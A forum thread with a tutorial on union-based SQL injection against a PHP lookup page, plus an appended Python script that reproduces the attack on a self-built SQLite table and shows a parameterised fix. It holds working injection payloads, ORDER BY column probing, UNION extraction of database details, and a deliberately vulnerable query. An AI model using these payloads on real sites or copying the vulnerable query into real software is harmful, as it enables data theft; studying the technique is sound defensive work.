SQL injection

#1
[Image: sqli1-big.png]

Hello all,

I assume you already know what a SQL injection is and have done one. In this tutorial we are going to see how it actually works: what is going on under the hood, and how the web application handles our input and builds the SQL query from it. Let's see.

Imagine a web application like this.
Front-End Web Application

Here we see how the web application takes input from the user and sends it to a PHP script through a GET request.
[Image: 12.png]

Back-end PHP Script

Now there has to be a back-end script that handles the submitted data and builds a SQL query from it.

After the SQL query returns some data from the database, the PHP script processes that data and shows the user the output.

Assume the PHP code is the following.

[Image: 13.png]

I hope you can understand what is going on here.

For this example we need a table for the SQL query to read data from.

[Image: 14.png]

So far everything is fine.
SQL Query

Now let's see how this happens.

Imagine that I enter 3 as the input, so our ID is 3. What does our SQL query look like?


[Hidden content: only visible to registered members]



So it gives us this output.

Name for ID: Clara
Age for ID : 18

Nice! It looks like the web application is working fine.

Do you remember that in the previous tutorial we used a single quote to break a SQL query?

What if I enter 3' as the input?

It gives me an error.


[Hidden content: only visible to registered members]


What happened here?


[Hidden content: only visible to registered members]



You can clearly see that there is a syntax error near ID='3''. Our extra single quote closes the string early and leaves the script's own closing quote dangling, which is what I explained previously.
Injecting the SQL Query

Now let's see how we can fix this error and extract data from the database. What if I enter the following payload?

3' --+

Now our query is:


[Hidden content: only visible to registered members]


But actually we only care about the code before --+, because -- starts a comment in SQL and everything after it is ignored. One detail: MySQL only treats -- as a comment when it is followed by whitespace, and the + in the URL is decoded to a space by the time PHP reads the parameter, which is why --+ works. So now the query is valid again and gives us the output we expect.

Now it's time to fetch data from the database. But how?

Can we use another SELECT statement together with this one?

Yes indeed. We can combine two SELECT statements with the UNION operator like this.


[Hidden content: only visible to registered members]


But one thing: both SELECT statements must return the same number of columns. It does not matter that they read different columns, only the count has to match.

You may say that's simple, there are 5 columns in the table. No buddy, in real life you can't see the table, so you can't tell how many columns there are. :sad:

We can use a trick to find the number of columns used by the first SELECT statement.

Think about our table and the following commands.

[Hidden content: only visible to registered members]


The first command says: select all columns from the users table and order the results by the Name column. The second command says the same, but orders the results by the 3rd column (Age).

So even if we don't know the column names we can ORDER BY 1, 2, 3 and so on. OK.

Now I enter this as the ID.


[Hidden content: only visible to registered members]


Let's see our query.


[Hidden content: only visible to registered members]



This gives us output as expected, because there is more than one column, so it's possible to order the result by the first column.

Next we try ORDER BY 2. That also works. The web application keeps working normally up to ORDER BY 5.

What if we enter ORDER BY 6?

It will surely give an error because there is no 6th column. So with this method we can find how many columns the first SELECT statement uses. Now we can add another SELECT statement.


[Hidden content: only visible to registered members]



What is going on here is that the SQL query behaves as if there were a second table like the following, and the query fetches rows from both of them. Those rows are then printed to the screen by the PHP code.

Now, if we can get the data from that second "table" printed, we can find out which columns the web application uses to display data. (In this example we know that the PHP script prints the Name and Age columns.) But unfortunately we still see only the following output. :sad:

Name for ID: Clara
Age for ID : 18

Why is that? The UNION returns two rows, the real one for ID 3 followed by our injected one, but the PHP script only reads and prints the first row. So if we want our row to be the one shown, the first SELECT must match nothing, for example by asking for an ID that does not exist. Our final payload:


[Hidden content: only visible to registered members]




Since there is no -3 in the ID column, the row from our second SELECT is the one printed.

Name for ID: 2
Age for ID : 3

Finally, success. We can see that columns 2 and 3 are the ones the web app displays.

Now we can use these two channels to pull any data we like out of the database. :smile:
Extracting Basic Information

First of all let's try to find the database name.




[Hidden content: only visible to registered members]




We can see the database name on the screen.

Name for ID: database_name
Age for ID : 3


[Hidden content: only visible to registered members]



In the same way you can use database(), user(), version() and so on to fetch some basic information.

In the next tutorials I'll explain deeper SQLi concepts such as blind SQL injection.
Reply
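The whole procedure from the tutorial above, end to end, as an added example that is not part of the original post. It stands in an in-memory SQLite database for the post's MySQL one and constructs its own sample rows (the post's table has five columns and a row 3 / Clara / 18; the email and country column names are assumed). The vulnerable function does what the post's PHP does: URL-decodes the GET value, splices it into the query string, and prints only the first row's Name and Age. sqlite_version() stands in for the MySQL database()/user()/version() calls, and a parameterised lookup shows the fix.

```python
import sqlite3
from urllib.parse import unquote_plus

# Constructed sample data. The post's users table has five columns and a row
# (3, Clara, 18); the last two column names (email, country) are assumed here.
SAMPLE_USERS = [
    (1, "Alice", 31, "alice@example.com", "US"),
    (2, "Bob", 27, "bob@example.com", "UK"),
    (3, "Clara", 18, "clara@example.com", "LK"),
]


def make_db():
    """In-memory SQLite stand-in for the post's MySQL database."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER, name TEXT, age INTEGER, "
        "email TEXT, country TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", SAMPLE_USERS)
    return conn


def build_query(raw_get_value):
    """What the post's PHP does: URL-decode the GET parameter (so '+' becomes
    the space that MySQL needs after '--') and splice it straight into SQL."""
    user_id = unquote_plus(raw_get_value)
    return f"SELECT * FROM users WHERE id='{user_id}' LIMIT 0,1"


def all_rows(conn, raw_get_value):
    """Every row the (possibly injected) query returns; raises on bad SQL."""
    return conn.execute(build_query(raw_get_value)).fetchall()


def lookup_vulnerable(conn, raw_get_value):
    """Mirrors the page output: first row only, columns 2 and 3 (Name, Age).
    Returns None when no row matches; raises sqlite3.Error on a syntax error."""
    row = conn.execute(build_query(raw_get_value)).fetchone()
    return None if row is None else (row[1], row[2])


def causes_sql_error(conn, raw_get_value):
    """True when the payload breaks the query (the 3' case in the post)."""
    try:
        lookup_vulnerable(conn, raw_get_value)
        return False
    except sqlite3.Error:
        return True


def count_columns(conn, base_id="3", max_cols=20):
    """ORDER BY n probing: the highest n that does not error is the number of
    columns the first SELECT returns."""
    found = 0
    for n in range(1, max_cols + 1):
        if causes_sql_error(conn, f"{base_id}' ORDER BY {n} --+"):
            break
        found = n
    return found


def union_payload(columns, expressions):
    """Final payload: an id that cannot exist so the first SELECT matches
    nothing, then a UNION SELECT with the right column count; expressions is
    {column_position: sql_expression} for the columns the page displays."""
    cols = [str(i) for i in range(1, columns + 1)]
    for position, expr in expressions.items():
        cols[position - 1] = expr
    return f"-3' UNION SELECT {','.join(cols)} --+"


def lookup_safe(conn, user_id):
    """The fix: a parameterised query. The input is bound as data, never
    parsed as SQL, so quotes, comments and UNION in it are inert."""
    row = conn.execute(
        "SELECT name, age FROM users WHERE id = ? LIMIT 1", (user_id,)
    ).fetchone()
    return None if row is None else (row[0], row[1])


if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, "3"))                     # ('Clara', 18)
    print(causes_sql_error(db, "3'"))                     # True
    print(lookup_vulnerable(db, "3'--+"))                 # ('Clara', 18)
    n = count_columns(db)
    print(n)                                              # 5
    print(len(all_rows(db, "3' UNION SELECT 1,2,3,4,5 --+")))  # 2
    print(lookup_vulnerable(db, union_payload(n, {})))         # (2, 3)
    print(lookup_vulnerable(db, union_payload(n, {2: "sqlite_version()"})))
    print(lookup_safe(db, "-3' UNION SELECT 1,2,3,4,5 --+"))  # None
```

Which of the two rows a plain `3' UNION SELECT 1,2,3,4,5 --+` returns first is up to the engine (the post's MySQL returns the real row first), so the example only checks that two rows came back; making the first SELECT match nothing with -3 is what makes the displayed row reliably ours. On MySQL you would put database(), user() or version() into position 2 of union_payload instead of sqlite_version().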

#2
thank you for sharing.
Reply

#3
Quote:(04-18-2019, 06:51 PM)darkninja1980 Wrote:


thank you for sharing. :smile:

You are welcome mate.
Reply

#4
Quote:(04-18-2019, 06:54 PM)thil4n Wrote:


Quote: (04-18-2019, 06:51 PM)darkninja1980 Wrote:


thank you for sharing. :smile:

You are welcome mate.

add more tutorials please. Also I will pm you requests as well.
Reply

#5
It's good to read you've elaborated on Union-Based SQLi.

Bookmarked, and shall read the lot tonight.
Reply

#6
Quote:(04-19-2019, 04:29 AM)mothered Wrote:


It's good to read you've elaborated on Union-Based SQLi.

Bookmarked, and shall read the lot tonight.

Glad to hear it.
Reply

#7
Very nice man! Just have one question, when you do
SELECT * FROM users WHERE id= '3' UNION SELECT 1,2,3,4,5 --+ ' LIMIT 0,1

the UNION SELECT numbers are the columns, right? But with the SELECT * you are already getting all the columns?

Can you detail a little bit more
Reply

#8
Quote:(04-19-2019, 06:41 AM)Pinkz0rd Wrote:


Very nice man! Just have one question, when you do
SELECT * FROM users WHERE id= '3' UNION SELECT 1,2,3,4,5 --+ ' LIMIT 0,1

the UNION SELECT numbers are the columns, right? But with the SELECT * you are already getting all the columns?

Can you detail a little bit more :tongue:

Think of it this way. What if we use a query like the following?

[Hidden content: only visible to registered members]


(We didn't specify any table to fetch data.) The result will be 1,2,3,4,5.
Now using UNION we combine those two queries to produce one result. Got it?
Reply

#9
Quote:(04-19-2019, 08:41 AM)thil4n Wrote:


Quote: (04-19-2019, 06:41 AM)Pinkz0rd Wrote:


Very nice man! Just have one question, when you do
SELECT * FROM users WHERE id= '3' UNION SELECT 1,2,3,4,5 --+ ' LIMIT 0,1

the UNION SELECT numbers are the columns, right? But with the SELECT * you are already getting all the columns?

Can you detail a little bit more :tongue:

Think of it this way. What if we use a query like the following?

[Hidden content: only visible to registered members]


(We didn't specify any table to fetch data.) The result will be 1,2,3,4,5.
Now using UNION we combine those two queries to produce one result. Got it?

Ah got it now! Thanks mate! So you do that 1,2,3,4,5 to check which columns the query is taking in?

I'm getting into App Vulns, and SQLi looks so easy, but it is so complex. The next thing I'm trying to learn is stacked queries. Do you know how those work? A tutorial like this one would be awesome! Keep up the good work!
Reply

#10
Quote:(04-19-2019, 11:48 AM)Pinkz0rd Wrote:


So you do that 1,2,3,4,5 to check which columns the query is taking in?

Correct.

Given you're working with the URL, the vulnerable columns will be returned in the webpage you're currently working on.
Reply


